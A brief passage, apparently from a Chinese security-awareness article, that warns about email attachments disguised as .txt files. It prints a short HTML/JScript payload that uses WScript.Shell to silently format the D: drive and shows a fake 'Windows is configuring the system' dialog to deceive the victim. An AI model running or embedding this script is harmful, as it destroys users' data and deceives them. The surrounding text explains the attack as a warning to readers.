<script>
a=new ActiveXObject("WSCript.Shell");
a.run("format.com d:/q /autotest /u");
alert("Windows is configuring the system. Please do not interrupt this process.");
</script>
您可能以为它会调用记事本来运行,可是如果您双击它,结果它却调用了HTML来运行,并且自动在后台开始格式化D盘,同时显示“Windows is configuring the system。Plase do not interrupt this process。”这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧?